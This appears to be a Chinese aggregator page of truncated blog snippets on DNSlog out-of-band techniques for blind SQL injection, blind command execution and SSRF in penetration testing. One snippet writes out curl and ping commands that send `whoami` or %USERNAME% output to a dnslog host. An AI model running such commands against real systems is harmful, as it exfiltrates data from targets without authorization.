dnslog

在某些情况下，无法利用漏洞获得回显。但是，如果目标可以发送DNS请求，则可以通过DNS log方式将想获得的数据外带出来。 DNS log常用于以下情况： SQL盲注 无回显的命令执行 无回显的SSRF 网上公开提供dnslog服务有很多，比如dnslog.cn、知道创宇、三叶草等等，但是这些提供的 ......

# Bridge 无回显漏洞测试辅助平台 (Spring Boot + Spring Security + Netty) 平台使用Java编写，提供DNSLOG，HTTPLOG等功能，辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 https://github.com/SPuerBRea ......

#红队技巧4:利用dnslog执行命令 ##前言 在盲RCE的地方,在反弹shell没有成功的情况下,利用dnslog外带信息是一种很好的方式,dnslog平台可以是dnslog.cn,ceye.io, 也可以是自己搭建的,现在我们的目标是把这一处盲RCE的地方升级为可交互的getshell,然后用 ......

一、DNS基本概念 0x1：DNS中不同域名类型概念 DNS的全称是Domain Name System（网络名称系统），它作为将域名和IP地址相互映射，使人更方便地访问互联网。当用户输入某一网址如littlehann.com，网络上的DNS Server会将该域名解析，并找到对应的真实IP如101 ......

一、命令执行场景Liunx/Unix/Mac OS系统: curl http://ip.port.xxx.dnslog.org/`whoami`ping `whoami`.ip.port.xxx.dnslog.org Windows系统: ping %USERNAME%.xxx.dnslog.org ......

DNSlog注入 使用场景： 由于在盲注过程中，手工测试需要花费大量的时间，我们可能会想到使用sqlmap直接去跑出数据 但在实际测试中，使用sqlmap跑盲注，发包太多，网站很可能把ip给封掉，也许你会考虑使用代理池 这个时候可以尝试利用DNSlog注入，可以快速得到结果 原理： 在某些无法直接利 ......

大自然的搬运工转载自https://www.cnblogs.com/sstfy/p/10351807.html dnslog小技巧 一、dnslog利用场景 主要针对无回显的情况。 Sql-Blind RCE SSRF RFI（Remote File Inclusion） 二、原理 将dnslog平 ......